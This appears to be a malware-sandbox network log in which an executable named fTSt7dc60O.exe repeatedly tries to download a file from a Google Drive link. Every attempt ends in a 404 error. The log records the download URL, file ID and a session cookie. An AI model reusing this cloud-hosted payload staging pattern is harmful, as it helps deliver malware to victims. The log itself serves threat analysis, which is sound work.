                                                    X-GUploader-UploadID: AFIdbgT1onx0nu54vQZxvHlZa-c5JGJbZmkyIJ7uSX93FbYGUarmBgRJeXKLbIVZ6PIexQqMMJIjtow
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:41 GMT
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy: script-src 'nonce-t2NhpWlHafpLxdxe91oQwA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:39:42 UTC | 1652 | IN
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="elTZOc8oFDfxlcziZBXBtQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    34 | 192.168.2.7 | 52219 | 172.217.18.14 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:39:42 UTC | 417 | OUT | GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:43 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:43 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: script-src 'nonce-IGfBYNCdRgrMo9kffGC5XQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    35 | 192.168.2.7 | 52220 | 142.250.186.161 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:39:43 UTC | 459 | OUT | GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:44 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFiumC4g6KdTmPccLuYOMM569hG1DZJe1bAm1m9iXCBxkn0C8tuc8z6ldQ9gvVohXu8XWciqsQ6iTrs
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:44 GMT
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Security-Policy: script-src 'nonce-go566t6gLcqa_WBfPSl4AA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:39:44 UTC | 1652 | IN
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="SdfXSz_szNH4Do3acLPAig">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    36 | 192.168.2.7 | 52221 | 172.217.18.14 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:39:45 UTC | 417 | OUT | GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:45 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:45 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: script-src 'nonce-el9EzKA_7I2bsvO3cs8kag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    37 | 192.168.2.7 | 52222 | 142.250.186.161 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:39:46 UTC | 459 | OUT | GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:46 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFiumC53BIWLhSH4CRJxxJ4Hbf_NKfjSbCjhipd0Ah-OyED6klhWJkMu_7HckAXIDX4XElktzP_BSIk
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:46 GMT
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy: script-src 'nonce-gSRM6WAvQwqHabIx-Bk-lw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:39:46 UTC | 1652 | IN
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="BMycWTtzZqZFwW4d1oWhOg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    38 | 192.168.2.7 | 52223 | 172.217.18.14 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:39:47 UTC | 417 | OUT | GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:48 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:47 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: script-src 'nonce-sNQIIhWxb0OQuDLrO8sLTA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    39 | 192.168.2.7 | 52224 | 142.250.186.161 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:39:48 UTC | 459 | OUT | GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:49 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgSYBtUHanGvGgUqGRx6T2mX52O4e885EmUmk4qiqieOZsym2WnS6wE_PMrFc71F9cnS
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:49 GMT
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: script-src 'nonce-XA6CujBmxbACi7hIrnJZqw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:39:49 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="udkgvfZQslOLHsuAzc_TDA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    40 | 192.168.2.7 | 52225 | 172.217.18.14 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:39:49 UTC | 417 | OUT | GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:50 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:50 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: script-src 'nonce-NW5RhiGysCsBMI9SZHXVcw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    41 | 192.168.2.7 | 52226 | 142.250.186.161 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:39:51 UTC | 459 | OUT | GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:51 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFiumC6crM6FOApL-R-Y65smVto2_5SBvTfa13w3CwnHoIA_3kNbi7sJvhnVGC19Gy-Hb2oCRtcZ4nk
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:51 GMT
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-59TWLRx8l9JYw0Xroa2K2A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:39:51 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="F9VKK7q7AHpVT3NR1eoEwg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    42 | 192.168.2.7 | 52227 | 172.217.18.14 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
